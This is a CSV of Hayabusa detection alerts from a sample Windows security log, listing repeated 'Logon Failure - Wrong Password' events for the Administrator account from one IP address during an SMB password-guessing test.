2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mM6Olq0zYkMlwmrb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mUehtGEh0EqRHiLP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EhZ2KHmCTonGrXSS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NZea5qiet7vrT3iv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aNWY8kuJMSy8h0Zk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bt9DUQ0mwhkJlTt8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zXYtsM2MMuNSYtVr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WgzvsdMN2SU7Knlh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DxiBYXNCY32yNb6L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cVfJmOxvsp75g3a0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uHp1hlHjD8w3WKt3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dEeJWAJgOeueYSM9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tOfPGoUXu932L80d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NbH4R6GK1PIVT3ij  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PgsJokRd07Nh1lO1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 11ylyxQyV5HCJ18g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Am2qI1ya4wYdqErV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5o2AmZsYUYmDpWZE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c0Hd8xWxOxFifJBG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hlh64Gtfoig2uzOY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LtK8Hj2kf3dfFSnW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VKUPqxtNqkVqXgTg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SKSxp87CBg8L8wSi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CpvxvR0ftQs1gdEF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U9RGDzNMt9fM6rLF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RvOO9NLhbbKJXQq9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mDB9bIx7LcoJ6IAU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pfJWsGqlQTmFUUPT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9PRIO3MASsjrdQGs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: P9QCn4nZHB0ENeA1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4iUNHB1gE2d1dBfZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tM3IdtrLdVXQjOjB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dbmn9Er9e1JZZybc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SY40ARcAoo9cWQIP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Fc7m0blzidQfn1BU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 13SkGPbDDXou7qLA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2YIlJeZpJlvcKgqt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BRhH6atcwLcGmrB4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BGIInLsy4UCfl0oW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4qJ7nEN0u9DkVuVH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6qb85lEENmrj4ebF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q6RXAj26rnxMmxuL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tas7cqRNGQw6FlVX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FQlF8GYIeWytFLsJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dj48ftx52s1HntRT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B46vTS9PxUgUblBp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eoIFbywJEC0QaceV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PSXqaP0i1eeKQOmX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gke4vfzIAC3k0yXU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZnjxfeIX4ra6vmBA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ChR30FLLOT3Pvapv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VkepVf00vkpVp9yV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5i2AxYxwCX6DvP3M  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j8Fvcw2mQBI61mxH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eAazyOpBig2G3Z78  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o1g3rjPQQAXEK2yz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2BC68zrAEF6L00xS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8xD2aZArxVdrO6fG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HHJN2mJgwQEZhXBG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: untyxmsmYrfRlHcu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eOc2R5V6p9VBsYI2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V5Ld2NDMjbY3tiT7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ykdbglaCU82nRvk5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tDGrsVIC5qVEwC6i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UouNQa3EkcsMICiO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u0exIftdu0qPLrRC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q5mMNIdJj0BItrv6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pb2cVBffdBlwwGQP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p2FbHoSFFdnM4wH7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RAbCN4xKDDlhmrkU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pxBwuSDdNZlE2F96  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: M3JkwIQF7yV42rOP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
